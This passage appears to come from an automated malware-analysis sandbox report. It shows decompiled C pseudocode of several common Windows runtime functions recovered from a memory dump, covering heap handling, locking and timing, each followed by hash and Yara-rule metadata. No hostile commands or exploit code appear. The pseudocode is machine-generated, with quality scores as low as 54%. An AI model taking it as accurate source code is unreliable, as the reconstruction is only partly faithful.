					_v44 = _t155 + 0x10;
					E1E3C2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x1e49b1e0();
						 *( *(_t106 + 0x30) ^  *0x1e496110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x1e49b1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x1e496110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E1E3BFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E1E3EB640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x1e38ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}

0x1e472efc
0x1e472efd
0x1e472eff
0x1e472f03
0x1e472f0a
0x1e472f0c
0x1e472f15
0x1e472fba
0x1e472fbb
0x1e472fc5
0x1e472fcd
0x1e472fcf
0x1e472fd3
0x1e472fd4
0x1e472fd5
0x1e472fd7
0x1e472fda
0x1e472fdb
0x1e472fdd
0x1e472fe0
0x1e472fe2
0x1e472ffc
0x1e472fe4
0x1e472fe4
0x1e472fea
0x1e472fed
0x1e472fef
0x1e472ff6
0x1e472ff1
0x1e472ff1
0x1e472ff1
0x1e472fef
0x1e472fff
0x1e473001
0x1e47301b
0x1e473003
0x1e473003
0x1e47300e
0x1e473015
0x1e473010
0x1e473010
0x1e473010
0x1e473010
0x1e47300e
0x1e47302c
0x1e473035
0x1e47303c
0x1e473046
0x1e47304e
0x1e473056
0x1e47305a
0x1e47305e
0x1e473063
0x1e473067
0x1e47306b
0x1e47306f
0x1e473072
0x1e4730af
0x1e4730b5
0x1e4730c1
0x1e4730c9
0x1e4730c9
0x1e4730c9
0x00000000
0x1e473074
0x1e473081
0x1e473089
0x1e47308b
0x1e47308d
0x1e473093
0x1e47309a
0x1e4730ce
0x1e4730d1
0x1e4730d5
0x1e4730d5
0x1e4730d5
0x1e47308d
0x1e4730db
0x1e4730e6
0x1e4730e7
0x1e4730e8
0x1e4730e9
0x1e4730f3
0x1e472f27
0x1e472f29
0x1e472f2b
0x1e472f2d
0x1e472f36
0x1e472f3d
0x1e472f4c
0x1e472f58
0x1e472fad
0x1e472fb7
0x1e472fb7

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
Instruction ID: 518e556eb0e9a2ab83d72e5dfca275952ca86c127d810fbea33c46b1ee6645f2
Opcode Fuzzy Hash: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
Instruction Fuzzy Hash: C121DD712041500FD745CF1AC8E09B6BFF5EFC611275682F6D984EF742C9289417D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E47070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1E47070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E1E4707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E1E46AFDE( &_v8,  &_v12);
					E1E471293(_t38, _v28, _t60);
					if(E1E3C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E1E4614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x1e47071b
0x1e470724
0x1e470734
0x1e470738
0x1e47074b
0x1e47074b
0x1e470753
0x1e470753
0x1e470759
0x1e47075d
0x1e470774
0x1e470779
0x1e47077d
0x1e470789
0x1e470795
0x1e4707a7
0x1e470797
0x1e4707a0
0x1e4707a0
0x1e4707af
0x1e4707c4
0x1e4707cd
0x1e4707cd
0x1e4707af
0x1e4707dc

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 47bfa6770991ee00ecab4e7836f8099a9864e2e2ee679159d12d3621e3ffbfdc
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 7521D47A6042449FD705CF28C890BAABBE6EFC4750F04866EF9959B385D730E909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1E3CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E1E3C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E1E3C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E1E3C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E1E3C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E1E427794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x1e3cae78
0x1e3cae7c
0x1e3cae7e
0x1e3cae81
0x1e3cae86
0x1e3cae8d
0x1e412691
0x1e3cae93
0x1e3cae93
0x1e3cae93
0x1e3cae98
0x1e3cae9d
0x1e4126a2
0x1e4126b4
0x1e4126a4
0x1e4126ad
0x1e4126ad
0x1e4126b9
0x00000000
0x1e4126bb
0x00000000
0x1e4126bb
0x1e3caea3
0x1e3caea3
0x1e3caea3
0x1e3caeaa
0x1e4126c0
0x1e4126c9
0x1e4126c9
0x1e3caeb3
0x1e4126d4
0x1e4126e1
0x00000000
0x00000000
0x1e4126e7
0x1e4126ee
0x1e4126f0
0x1e4126f9
0x1e4126f9
0x1e412702
0x1e412708
0x1e412708
0x1e41270b
0x1e41270f
0x1e412711
0x1e412711
0x1e412725
0x1e412725
0x00000000
0x1e3caeb9
0x1e3caeb9
0x1e3caebf
0x1e3caebf
0x1e3caeb3

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 2678dc13aa6ad9e5b12bc8bd97a860c96e35295f7f6ca576dcb3bc6952bf8234
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: C121D4B16016C19FDB029B75C954B1577EAEF84A80F0502A2DD05CF792E734EC41D798

Uniqueness

Uniqueness Score: -1.00%

Function 1E471FF1, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E1E471FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x1e496110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x1e496110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x1e496110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x1e496110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}

0x1e471ff9
0x1e471ffc
0x1e472001
0x1e47200d
0x1e47201b
0x1e472028
0x1e47202e
0x1e472035
0x1e472038
0x1e47204c
0x1e472052
0x1e472053
0x1e472054
0x1e472055
0x1e472069
0x1e47206c
0x1e47206e
0x1e472079
0x1e472087
0x1e47209c
0x1e47209c
0x1e47202a
0x1e47202a
0x1e47202a
0x1e4720a5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
Instruction ID: 3ebd6286762f97805d0898d12143836c04d6565cd6a34d39fd6b9f7e305a367b
Opcode Fuzzy Hash: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
Instruction Fuzzy Hash: 2721A233A104259BDB18CF7CC8055A6F7E6FF9C21032A467BD912EB265EA70BD11CAC4

Uniqueness

Uniqueness Score: -1.00%

Function 1E427794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1E427794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1e497b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E1E3EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E1E3C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E1E3E9AE0();
					_t24 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x1e427799
0x1e42779a
0x1e42779b
0x1e4277a3
0x1e4277ab
0x1e4277ae
0x1e4277b1
0x1e4277b1
0x1e4277bf
0x1e4277c4
0x1e4277c8
0x1e4277ce
0x1e4277d4
0x1e4277e0
0x1e4277e0
0x1e4277d6
0x1e4277d6
0x1e4277de
0x00000000
0x00000000
0x1e4277de
0x1e4277e5
0x1e4277f0
0x1e4277f3
0x1e4277f6
0x1e4277fd
0x1e427800
0x1e42780c
0x1e427818
0x1e42782b
0x1e42781a
0x1e427823
0x1e427823
0x1e427830
0x1e427831
0x1e427838
0x1e42783d
0x1e42783e
0x1e42784f
0x1e42784f
0x1e42785a

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9017a5bf1fe72bebe57646f20c548d10785bf8ed19a7bb9f8355c2fd79f946
Instruction ID: 2f4b63812d8cd277fc185bcf39b81b58ed63263bd872555c5d56ca7a2987c74a
Opcode Fuzzy Hash: 1e9017a5bf1fe72bebe57646f20c548d10785bf8ed19a7bb9f8355c2fd79f946
Instruction Fuzzy Hash: 68219D76900644ABC715CF69D894E6BB7B9EF88340F10066AE90AD7750D734E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1E3DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E1E3B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x1e3dfd9b
0x1e3dfda0
0x1e3dfda1
0x1e3dfdab
0x1e3dfdad
0x1e3dfdb0
0x1e3dfdb8
0x1e3dfe0f
0x1e3dfde6
0x1e3dfde9
0x1e3dfdec
0x1e41c0c0
0x1e3dfdfe
0x1e3dfe06
0x1e3dfe06
0x1e41c0c8
0x1e3dfe2d
0x1e3dfe2d
0x00000000
0x1e3dfe2d
0x1e41c0d1
0x1e41c0e0
0x1e41c0e5
0x1e41c0e5
0x1e41c0e8
0x00000000
0x1e41c0e8
0x1e3dfdf4
0x00000000
0x00000000
0x1e3dfdf6
0x1e3dfdfa
0x1e3dfe1a
0x1e3dfe1f
0x1e3dfe1f
0x1e3dfdfc
0x00000000
0x1e3dfdfc
0x1e3dfdcc
0x1e3dfdd0
0x1e3dfe26
0x00000000
0x1e3dfe26
0x1e3dfdd8
0x1e3dfddb
0x1e3dfddd
0x1e3dfde0
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: dd0a4954e7e883381113e379fc02d1dd428d05ae4a56fde77942d0a259e05717
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 8E217C72600785DFC725CF4AC590B56B7EAFB94A10F61876EE9458B718D730ED84CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B841F, Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E1E3B841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E1E3E9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}

0x1e3b842f
0x1e3b8448
0x1e3b844e
0x1e3b8459
0x1e3b845b
0x1e3b8464
0x1e409ac3
0x1e409ac3
0x1e409ac5
0x1e409acb
0x00000000
0x00000000
0x1e409acd
0x1e409acd
0x1e409ad1
0x1e409ae9
0x1e3b846a
0x1e3b8475
0x1e3b8479
0x1e3b847c
0x1e3b8481
0x1e3b8482
0x1e3b849a

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction ID: 5a997e8936a07a3d5e6ed4091dd66b87fb4ad1fcba47ec51653e3f89f3374aeb
Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction Fuzzy Hash: 2C21A276E00119CBCB14CFA9C58068AF3F9FB8C350F664565E909B7740C630AE04CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1E3A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x1e47f708);
				E1E3FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E1E3E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E1E3E95D0();
				_t33 =  *0x1e4984c4; // 0x0
				L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x1e4984c4; // 0x0
				L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x1e4984c4; // 0x0
				E1E3C2280(L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x1e4986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E1E3E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E1E3E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E1E3A9325();
					_t50 =  *0x1e4984c4; // 0x0
					return E1E3FD0D1(L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x1e3a9240
0x1e3a9242
0x1e3a9247
0x1e3a924c
0x1e3a924e
0x1e3a9255
0x1e3a9257
0x1e3a925a
0x1e3a925f
0x1e3a925f
0x1e3a9266
0x1e3a9271
0x1e3a9276
0x1e3a9279
0x1e3a927e
0x1e3a9295
0x1e3a929a
0x1e3a92b1
0x1e3a92b6
0x1e3a92d7
0x1e3a92dc
0x1e3a92e0
0x1e3a92e6
0x1e3a92e8
0x1e3a92ee
0x1e3a9332
0x1e3a9333
0x1e3a9337
0x1e3a9338
0x1e3a933a
0x1e3a933a
0x1e3a933d
0x1e3a9342
0x1e3a9342
0x1e3a9345
0x1e3a9349
0x1e3a934e
0x1e3a9352
0x1e3a9357
0x1e3a92f4
0x1e3a92f4
0x1e3a92f6
0x1e3a92f9
0x1e3a9300
0x1e3a9306
0x1e3a9324
0x1e3a9324

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8aa7fb4dda48b10f25c185b8dfcee63e50e5891bae916fe61ea2acd985c23667
Instruction ID: 186954f33e793a54aed080c8146924cd6c5c46478d72dd95c52047c1131889f5
Opcode Fuzzy Hash: 8aa7fb4dda48b10f25c185b8dfcee63e50e5891bae916fe61ea2acd985c23667
Instruction Fuzzy Hash: 61215C7A041680DFC326DF28DE44F5AB7B9FF18304F084B69E109A76A1DB35E981CB44

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1E3DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E1E3C2280(_t12, 0x1e498608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E1E3E00C2(0x1e498608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x1e3db395
0x1e3db3a2
0x1e3db3a5
0x1e3db3aa
0x1e3db3b2
0x1e3db3ba
0x1e3db3bd
0x1e3db3c0
0x1e3db3c4
0x1e3db3c9
0x1e41a3e9
0x1e41a3ed
0x1e41a3f0
0x1e41a3ff
0x1e41a403
0x1e41a409
0x00000000
0x00000000
0x1e41a40b
0x1e41a40b
0x1e41a40f
0x1e41a415
0x1e41a423
0x1e41a423
0x1e41a415
0x1e3db3d1
0x1e3db3e8
0x1e3db3e8
0x1e3db3d9

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff40643ea6a6ff4c84ca7f9ae55abc3317f9ca554448327f074c588d6aa55581
Instruction ID: fb75b7beeb50fc20562e6b91abaecee23d096891668a2a0b0f24c275234ad67d
Opcode Fuzzy Hash: ff40643ea6a6ff4c84ca7f9ae55abc3317f9ca554448327f074c588d6aa55581
Instruction Fuzzy Hash: 99116B377112109BCB1D8E1A9D81A5BB69BFBC9770B65032AED16DB380CE31AC06D690

Uniqueness

Uniqueness Score: -1.00%

Function 1E434257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1E434257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x1e4808d0);
				E1E3FD08C(__ebx, __edi, __esi);
